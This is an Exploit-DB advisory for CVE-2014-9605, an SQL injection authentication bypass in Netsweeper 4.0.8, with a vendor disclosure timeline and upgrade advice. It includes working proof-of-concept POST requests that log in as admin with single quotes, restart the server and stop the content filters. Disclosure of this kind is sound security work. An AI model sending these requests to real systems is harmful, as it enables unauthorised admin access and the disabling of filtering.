Netsweeper 4.0.8 - SQL Injection / Authentication Bypass

EDB-ID:

37928

CVE:

2014-9605

EDB Verified:

Author:

Anastasios Monachos

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2015-08-21

Vulnerable App: 
+----------------------------------------------------------------+
+ Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +
+----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version 	: 4.0.8 (and probably other versions)
Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched      	: Yes
CVE		: CVE-2014-9605

+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.

+----------------------+
+ Exploitation Details +
+----------------------+
By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:
	i)   "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)
	ii)  "Restart" the server
	iii) "Stop the filters on the server"

Vulnerability Type: Authentication Bypass (using two single-quotes)
p0c: 	http://netsweeper/webupgrade/webupgrade.php
	POST: step=&login='&password='&show_advanced_output=                

p0c restart the server:
	http://netsweeper/webupgrade/webupgrade.php
	POST: step=12&login='&password='&show_advanced_output=
		
	followed by

	http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
	POST: step=12&restart=yes&show_advanced_output=false

p0c stop the filters on the server:
	http://netsweeper/webupgrade/webupgrade.php
	POST: step=9&stopservices=yes&show_advanced_output=

+----------+
+ Solution +
+----------+
Upgrade to latest version.

+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9605
11-Aug-2015: Public disclosure
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services